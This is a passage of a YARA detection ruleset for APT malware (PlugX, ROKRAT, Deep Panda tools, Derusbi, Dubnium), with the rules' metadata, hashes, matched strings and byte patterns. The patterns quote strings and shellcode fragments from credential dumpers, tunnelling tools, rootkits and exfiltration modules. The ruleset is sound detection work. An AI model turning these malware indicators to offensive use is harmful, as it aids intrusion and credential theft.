"dropper, Version 1.0" fullword wide $x2 = "dropper" fullword wide $x3 = "DROPPER" fullword wide $x4 = "About dropper" fullword wide $s1 = "Microsoft Windows Manager Utility" fullword wide $s2 = "SYSTEM\\CurrentControlSet\\Services\\" fullword ascii /* Goodware String - occured 9 times */ $s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify" fullword ascii /* Goodware String - occured 10 times */ $s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3" ascii /* Goodware String - occured 46 times */ $s5 = "<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>" fullword ascii /* Goodware String - occured 65 times */ condition: uint16(0) == 0x5a4d and filesize < 900KB and 1 of ($x*) and 2 of ($s*) } rule Codoso_PlugX_1 { meta: description = "Detects Codoso APT PlugX Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" super_rule = 1 hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b" hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8" hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2" strings: $s1 = "GETPASSWORD1" fullword ascii $s2 = "NvSmartMax.dll" fullword ascii $s3 = "LICENSEDLG" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 800KB and all of them } rule Codoso_PGV_PVID_3 { meta: description = "Detects Codoso APT PGV PVID Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" super_rule = 1 hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1" hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75" hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761" hash4 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1" hash5 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3" hash6 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe" strings: $x1 = "Copyright (C) Microsoft Corporation. All rights reserved.(C) 2012" fullword wide condition: $x1 } rule Codoso_PGV_PVID_2 { meta: description = "Detects Codoso APT PGV PVID Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" super_rule = 1 hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75" hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3" hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe" strings: $s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii $s1 = "regsvr32.exe /s \"%s\"" fullword ascii $s2 = "Help and Support" fullword ascii $s3 = "netsvcs" fullword ascii $s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" fullword ascii /* Goodware String - occured 4 times */ $s10 = "winlogon" fullword ascii /* Goodware String - occured 4 times */ $s11 = "System\\CurrentControlSet\\Services" fullword ascii /* Goodware String - occured 11 times */ condition: uint16(0) == 0x5a4d and filesize < 907KB and all of them } rule Codoso_PGV_PVID_1 { meta: description = "Detects Codoso APT PGV PVID Malware" author = "Florian Roth" reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" date = "2016-01-30" super_rule = 1 hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824" hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3" hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7" hash4 = "ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266" hash5 = "e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1" strings: $x1 = "Cookie: pgv_pvid=" ascii $x2 = "DRIVERS\\ipinip.sys" fullword wide $s1 = "TsWorkSpaces.dll" fullword ascii $s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide $s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii $s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii $s5 = "Microsoft Chart ActiveX Control" fullword wide $s6 = "MSChartCtrl.ocx" fullword wide $s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii $s8 = "WUServiceMain" fullword ascii /* Goodware String - occured 2 times */ condition: ( uint16(0) == 0x5a4d and ( 1 of ($x*) or 3 of them ) ) or 5 of them } rule ROKRAT_loader : TAU DPRK APT { meta: author = "CarbonBlack Threat Research" //JMyers date = "2018-Jan-11" description = "Designed to catch loader observed used with ROKRAT malware" reference = "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/" rule_version = 1 yara_version = "3.7.0" TLP = "White" exemplar_hashes = "e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd" strings: $n1 = "wscript.exe" $n2 = "cmd.exe" $s1 = "CreateProcess" $s2 = "VirtualAlloc" $s3 = "WriteProcessMemory" $s4 = "CreateRemoteThread" $s5 = "LoadResource" $s6 = "FindResource" $b1 = {33 C9 33 C0 E8 00 00 00 00 5E} //Clear Register, call+5, pop ESI $b2 = /\xB9.{3}\x00\x81\xE9?.{3}\x00/ //subtraction for encoded data offset //the above regex could slow down scanning $b3 = {03 F1 83 C6 02} //Fix up position $b4 = {3E 8A 06 34 90 46} //XOR decode Key $b5 = {3E 30 06 46 49 83 F9 00 75 F6} //XOR routine and jmp to code //push api hash values plain text $hpt_1 = {68 EC 97 03 0C} //api name hash value – Global Alloc $hpt_2 = {68 54 CA AF 91} //api name hash value – Virtual Alloc $hpt_3 = {68 8E 4E 0E EC} //api name hash value – Load Library $hpt_4 = {68 AA FC 0D 7C} //api name hash value – GetProc Addr $hpt_5 = {68 1B C6 46 79} //api name hash value – Virtual Protect $hpt_6 = {68 F6 22 B9 7C} //api name hash value – Global Free //push api hash values encoded XOR 0x13 $henc_1 = {7B FF 84 10 1F} //api name hash value – Global Alloc $henc_2 = {7B 47 D9 BC 82} //api name hash value – Virtual Alloc $henc_3 = {7B 9D 5D 1D EC} //api name hash value – Load Library $henc_4 = {7B B9 EF 1E 6F} //api name hash value – GetProc Addr $henc_5 = {7B 08 D5 55 6A} //api name hash value – Virtual Protect $henc_6 = {7B E5 31 AA 6F} //api name hash value – Global Free condition: (1 of ($n*) and 4 of ($s*) and 4 of ($b*)) or all of ($hpt*) or all of ($henc*) } rule ROKRAT_payload : TAU DPRK APT { meta: author = "CarbonBlack Threat Research" //JMyers date = "2018-Jan-11" description = "Designed to catch loader observed used with ROKRAT malware" reference = "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/" rule_version = 1 yara_version = "3.7.0" TLP = "White" exemplar_hashes = "e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573" strings: $s1 = "api.box.com/oauth2/token" wide $s2 = "upload.box.com/api/2.0/files/content" wide $s3 = "api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1" wide $s4 = "cloud-api.yandex.net/v1/disk/resources/download?path=%s" wide $s5 = "SbieDll.dll" $s6 = "dbghelp.dll" $s7 = "api_log.dll" $s8 = "dir_watch.dll" $s9 = "def_%s.jpg" wide $s10 = "pho_%s_%d.jpg" wide $s11 = "login=%s&password=%s&login_submit=Authorizing" wide $s12 = "gdiplus.dll" $s13 = "Set-Cookie:\\b*{.+?}\\n" wide $s14 = "charset={[A-Za-z0-9\\-_]+}" wide condition: 12 of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" /* APTAnthemDeepPanda */ rule Anthem_DeepPanda_sl_txt_packed { meta: description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed" author = "Florian Roth" date = "2015/02/08" hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34" strings: $s0 = "Command line port scanner" fullword wide $s1 = "sl.exe" fullword wide $s2 = "CPports.txt" fullword ascii $s3 = ",GET / HTTP/.}" fullword ascii $s4 = "Foundstone Inc." fullword wide $s9 = " 2002 Foundstone Inc." fullword wide $s15 = ", Inc. 2002" fullword ascii $s20 = "ICMP Time" fullword ascii condition: all of them } rule Anthem_DeepPanda_lot1 { meta: description = "Anthem Hack Deep Panda - lot1.tmp-pwdump" author = "Florian Roth" date = "2015/02/08" hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1" strings: $s0 = "Unable to open target process: %d, pid %d" fullword ascii $s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii $s2 = "Target: Failed to load SAM functions." fullword ascii $s5 = "Error writing the test file %s, skipping this share" fullword ascii $s6 = "Failed to create service (%s/%s), error %d" fullword ascii $s8 = "Service start failed: %d (%s/%s)" fullword ascii $s12 = "PwDump.exe" fullword ascii $s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii $s14 = ":\\\\.\\pipe\\%s" fullword ascii $s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii $s16 = "dump logon session" fullword ascii $s17 = "Timed out waiting to get our pipe back" fullword ascii $s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii $s20 = "%s\\%s.exe" fullword ascii condition: 10 of them } rule Anthem_DeepPanda_htran_exe { meta: description = "Anthem Hack Deep Panda - htran-exe" author = "Florian Roth" date = "2015/02/08" hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9" strings: $s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii $s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii $s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" fullword ascii $s3 = "[SERVER]connection to %s:%d error" fullword ascii $s4 = "-tran <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii $s5 = "[-] ERROR: Must supply logfile name." fullword ascii $s6 = "[-] There is a error...Create a new connection." fullword ascii $s7 = "[+] Accept a Client on port %d from %s" fullword ascii $s8 = "======================== htran V%s =======================" fullword ascii $s9 = "[-] Socket Listen error." fullword ascii $s10 = "[-] ERROR: open logfile" fullword ascii $s11 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii $s12 = "[+] Make a Connection to %s:%d ......" fullword ascii $s14 = "Recv %5d bytes from %s:%d" fullword ascii $s15 = "[+] OK! I Closed The Two Socket." fullword ascii $s16 = "[+] Waiting another Client on port:%d...." fullword ascii $s17 = "[+] Accept a Client on port %d from %s ......" fullword ascii $s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii condition: 10 of them } rule Anthem_DeepPanda_Trojan_Kakfum { meta: description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll" author = "Florian Roth" date = "2015/02/08" hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2" hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f" strings: $s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii $s1 = "%s\\sqlsrv32.dll" fullword ascii $s2 = "%s\\sqlsrv64.dll" fullword ascii $s3 = "%s\\%d.tmp" fullword ascii $s4 = "ServiceMaix" fullword ascii $s15 = "sqlserver" fullword ascii condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule APT_DeputyDog_Fexel { meta: author = "ThreatConnect Intelligence Research Team" strings: $180 = "180.150.228.102" wide ascii $0808cmd = {25 30 38 78 30 38 78 00 5C 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 [2-6] 43 00 61 00 6E 00 27 00 74 00 20 00 6F 00 70 00 65 00 6E 00 20 00 73 00 68 00 65 00 6C 00 6C 00 21} $cUp = "Upload failed! [Remote error code:" nocase wide ascii $DGGYDSYRL = {00 44 47 47 59 44 53 59 52 4C 00} $GDGSYDLYR = "GDGSYDLYR_%" wide ascii condition: any of them } rule APT_DeputyDog { meta: Author = "FireEye Labs" Date = "2013/09/21" Description = "detects string seen in samples used in 2013-3893 0day attacks" Reference = "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" strings: $mz = {4d 5a} $a = "DGGYDSYRL" condition: ($mz at 0) and $a } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule apt_nix_elf_derusbi { meta: Author = "@seifreed" strings: $ = "LxMain" $ = "execve" $ = "kill" $ = "cp -a %s %s" $ = "%s &" $ = "dbus-daemon" $ = "--noprofile" $ = "--norc" $ = "TERM=vt100" $ = "/proc/%u/cmdline" $ = "loadso" $ = "/proc/self/exe" $ = "Proxy-Connection: Keep-Alive" $ = "Connection: Keep-Alive" $ = "CONNECT %s" $ = "HOST: %s:%d" $ = "User-Agent: Mozilla/4.0" $ = "Proxy-Authorization: Basic %s" $ = "Server: Apache" $ = "Proxy-Authenticate" $ = "gettimeofday" $ = "pthread_create" $ = "pthread_join" $ = "pthread_mutex_init" $ = "pthread_mutex_destroy" $ = "pthread_mutex_lock" $ = "getsockopt" $ = "socket" $ = "setsockopt" $ = "select" $ = "bind" $ = "shutdown" $ = "listen" $ = "opendir" $ = "readdir" $ = "closedir" $ = "rename" condition: (uint32(0) == 0x4464c457f) and (all of them) } rule apt_nix_elf_derusbi_kernelModule { meta: Author = "@seifreed" strings: $ = "__this_module" $ = "init_module" $ = "unhide_pid" $ = "is_hidden_pid" $ = "clear_hidden_pid" $ = "hide_pid" $ = "license" $ = "description" $ = "srcversion=" $ = "depends=" $ = "vermagic=" $ = "current_task" $ = "sock_release" $ = "module_layout" $ = "init_uts_ns" $ = "init_net" $ = "init_task" $ = "filp_open" $ = "__netlink_kernel_create" $ = "kfree_skb" condition: (uint32(0) == 0x4464c457f) and (all of them) } rule apt_nix_elf_Derusbi_Linux_SharedMemCreation { meta: Author = "@seifreed" strings: $byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 } condition: (uint32(0) == 0x464C457F) and (any of them) } rule apt_nix_elf_Derusbi_Linux_Strings { meta: Author = "@seifreed" strings: $a1 = "loadso" wide ascii fullword $a2 = "\nuname -a\n\n" wide ascii $a3 = "/dev/shm/.x11.id" wide ascii $a4 = "LxMain64" wide ascii nocase $a5 = "# \\u@\\h:\\w \\$ " wide ascii $b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide $b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide $b3 = "ret %d" wide fullword $b4 = "uname -a\n\n" wide ascii $b5 = "/proc/%u/cmdline" wide ascii $b6 = "/proc/self/exe" wide ascii $b7 = "cp -a %s %s" wide ascii $c1 = "/dev/pts/4" wide ascii fullword $c2 = "/tmp/1408.log" wide ascii fullword condition: uint32(0) == 0x464C457F and ((1 of ($a*) and 4 of ($b*)) or (1 of ($a*) and 1 of ($c*)) or 2 of ($a*) or all of ($b*)) } rule apt_win_exe_trojan_derusbi { meta: Author = "@seifreed" strings: $sa_1 = "USB" wide ascii $sa_2 = "RAM" wide ascii $sa_3 = "SHARE" wide ascii $sa_4 = "HOST: %s:%d" $sa_5 = "POST" $sa_6 = "User-Agent: Mozilla" $sa_7 = "Proxy-Connection: Keep-Alive" $sa_8 = "Connection: Keep-Alive" $sa_9 = "Server: Apache" $sa_10 = "HTTP/1.1" $sa_11 = "ImagePath" $sa_12 = "ZwUnloadDriver" $sa_13 = "ZwLoadDriver" $sa_14 = "ServiceMain" $sa_15 = "regsvr32.exe" $sa_16 = "/s /u" wide ascii $sa_17 = "rand" $sa_18 = "_time64" $sa_19 = "DllRegisterServer" $sa_20 = "DllUnregisterServer" $sa_21 = { 8b [5] 8b ?? d3 ?? 83 ?? 08 30 [5] 40 3b [5] 72 } // Decode Driver $sb_1 = "PCC_CMD_PACKET" $sb_2 = "PCC_CMD" $sb_3 = "PCC_BASEMOD" $sb_4 = "PCC_PROXY" $sb_5 = "PCC_SYS" $sb_6 = "PCC_PROCESS" $sb_7 = "PCC_FILE" $sb_8 = "PCC_SOCK" $sc_1 = "bcdedit -set testsigning" wide ascii $sc_2 = "update.microsoft.com" wide ascii $sc_3 = "_crt_debugger_hook" wide ascii $sc_4 = "ue8G5" wide ascii $sd_1 = "NET" wide ascii $sd_2 = "\\\\.\\pipe\\%s" wide ascii $sd_3 = ".dat" wide ascii $sd_4 = "CONNECT %s:%d" wide ascii $sd_5 = "\\Device\\" wide ascii $se_1 = "-%s-%04d" wide ascii $se_2 = "-%04d" wide ascii $se_3 = "FAL" wide ascii $se_4 = "OK" wide ascii $se_5 = "2.03" wide ascii $se_6 = "XXXXXXXXXXXXXXX" wide ascii condition: (uint16(0) == 0x5A4D) and ( (all of ($sa_*)) or ((13 of ($sa_*)) and ( (5 of ($sb_*)) or (3 of ($sc_*)) or (all of ($sd_*)) or ( (1 of ($sc_*)) and (all of ($se_*)) ) ) ) ) } rule Trojan_Derusbi { meta: Author = "RSA_IR" Date = "4Sept13" File = "derusbi_variants v 1.3" MD5 = " c0d4c5b669cc5b51862db37e972d31ec " strings: $b1 = {8b 15 ?? ?? ?? ?? 8b ce d3 ea 83 c6 ?? 30 90 ?? ?? ?? ?? 40 3b 05 ?? ?? ?? ?? 72 ??} $b2 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E F7 5D 88 2E 0C A2 88 2E 4B 5D 88 2E F3 5D 88 2E} $b3 = {4E E6 40 BB} $b4 = {B1 19 BF 44} $b5 = {6A F5 44 3D ?? ?? 00 00 27 AF D4 3D 69 F5 44 3D 6E F5 44 3D 95 0A 44 3D D2 F5 44 3D 6A F5 44 3D} $b6 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E} $b7 = {D6 D5 A4 A3 ?? ?? 00 00 9B 8F 34 A3 D5 D5 A4 A3 D2 D5 A4 A3 29 2A A4 A3} $b8 = {C3 76 33 9F ?? ?? 00 00 8E 2C A3 9F C0 76 33 9F C7 76 33 9F 3C 89 33 9F} condition: 2 of ($b1, $b2, $b3, $b4) and 1 of ($b5, $b6, $b7, $b8) } rule APT_Derusbi_DeepPanda { meta: author = "ThreatConnect Intelligence Research Team" reference = "http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf" strings: $D = "Dom4!nUserP4ss" wide ascii condition: $D } rule APT_Derusbi_Gen { meta: author = "ThreatConnect Intelligence Research Team" strings: $2 = "273ce6-b29f-90d618c0" wide ascii $A = "Ace123dx" fullword wide ascii $A1 = "Ace123dxl!" fullword wide ascii $A2 = "Ace123dx!@#x" fullword wide ascii $C = "/Catelog/login1.asp" wide ascii $DF = "~DFTMP$$$$$.1" wide ascii $G = "GET /Query.asp?loginid=" wide ascii $L = "LoadConfigFromReg failded" wide ascii $L1 = "LoadConfigFromBuildin success" wide ascii $ph = "/photoe/photo.asp HTTP" wide ascii $PO = "POST /photos/photo.asp" wide ascii $PC = "PCC_IDENT" wide ascii condition: any of them } /* Yara Rule Set Author: Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud Date: 2015-12-09 Reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family Identifier: Derusbi Dez 2015 */ rule derusbi_kernel { meta: description = "Derusbi Driver version" date = "2015-12-09" author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud" strings: $token1 = "$$$--Hello" $token2 = "Wrod--$$$" $cfg = "XXXXXXXXXXXXXXX" $class = ".?AVPCC_BASEMOD@@" $MZ = "MZ" condition: $MZ at 0 and $token1 and $token2 and $cfg and $class } rule derusbi_linux { meta: description = "Derusbi Server Linux version" date = "2015-12-09" author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud" strings: $PS1 = "PS1=RK# \\u@\\h:\\w \\$" $cmd = "unset LS_OPTIONS;uname -a" $pname = "[diskio]" $rkfile = "/tmp/.secure" $ELF = "\x7fELF" condition: $ELF at 0 and $PS1 and $cmd and $pname and $rkfile } /* Yara Rule Set Author: Florian Roth Date: 2015-12-15 Identifier: Derusbi Dez 2015 */ rule Derusbi_Kernel_Driver_WD_UDFS { meta: description = "Detects Derusbi Kernel Driver" author = "Florian Roth" reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family" date = "2015-12-15" score = 80 hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016" hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a" hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58" hash4 = "e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59" strings: $x1 = "\\\\.\\pipe\\usbpcex%d" fullword wide $x2 = "\\\\.\\pipe\\usbpcg%d" fullword wide $x3 = "\\??\\pipe\\usbpcex%d" fullword wide $x4 = "\\??\\pipe\\usbpcg%d" fullword wide $x5 = "$$$--Hello" fullword ascii $x6 = "Wrod--$$$" fullword ascii $s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide $s2 = "Update.dll" fullword ascii $s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" fullword wide $s4 = "\\Driver\\nsiproxy" fullword wide $s5 = "HOST: %s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 800KB and (2 of ($x*) or all of ($s*)) } rule Derusbi_Code_Signing_Cert { meta: description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious" author = "Florian Roth" reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family" date = "2015-12-15" score = 40 strings: $s1 = "Fuqing Dawu Technology Co.,Ltd.0" fullword ascii $s2 = "XL Games Co.,Ltd.0" fullword ascii $s3 = "Wemade Entertainment co.,Ltd0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 800KB and 1 of them } rule XOR_4byte_Key { meta: description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)" author = "Florian Roth" reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family" date = "2015-12-15" score = 60 strings: /* Op Code */ $s1 = { 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 } /* test ecx, ecx jz short loc_590170 xor [esi], eax add [esi], ebx add esi, 4 dec ecx jmp short loc_590162 */ condition: uint16(0) == 0x5a4d and filesize < 900KB and all of them } rule apt_win32_dll_bergard_pgv_pvid_variant { meta: copyright = "Fidelis Cybersecurity" reference = "http://www.threatgeek.com/2016/05/turbo-twist-two-64-bit-derusbi-strains-converge.html" strings: $ = "Accept:" $ = "User-Agent: %s" $ = "Host: %s:%d" $ = "Cache-Control: no-cache" $ = "Connection: Keep-Alive" $ = "Cookie: pgv_pvid=" $ = "Content-Type: application/x-octet-stream" $ = "User-Agent: %s" $ = "Host: %s:%d" $ = "Pragma: no-cache" $ = "Connection: Keep-Alive" $ = "HTTP/1.0" condition: (uint16(0) == 0x5A4D) and (all of them) } /* Yara Rule Set Author: Florian Roth Date: 2016-06-10 Identifier: Dubnium */ /* Rule Set ----------------------------------------------------------------- */ rule Dubnium_Sample_1 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba" strings: $key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" fullword ascii $key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and all of them } rule Dubnium_Sample_2 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b" strings: $x1 = ":*:::D:\\:c:~:" fullword ascii $s2 = "SPMUVR" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule Dubnium_Sample_3 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" hash1 = "caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8" hash2 = "e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5" hash3 = "a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827" strings: $x1 = "copy /y \"%s\" \"%s\" " fullword ascii $x2 = "del /f \"%s\" " fullword ascii $s1 = "del /f /ah \"%s\" " fullword ascii $s2 = "if exist \"%s\" goto Rept " fullword ascii $s3 = "\\*.*.lnk" fullword ascii $s4 = "Dropped" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and 5 of them } rule Dubnium_Sample_5 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" super_rule = 1 hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b" hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8" hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf" hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b" hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0" hash6 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba" hash7 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9" hash8 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f" hash9 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b" strings: $s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" fullword ascii $s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 9000KB and all of them } rule Dubnium_Sample_6 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" super_rule = 1 hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b" hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0" hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba" strings: $s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." fullword ascii $s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" fullword ascii $s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 4000KB and all of them } rule Dubnium_Sample_7 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" super_rule = 1 hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b" hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8" hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf" hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b" hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0" hash6 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9" hash7 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f" hash8 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b" strings: $s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" fullword ascii $s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 9000KB and all of them } rule Dubnium_Sample_SSHOpenSSL { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = 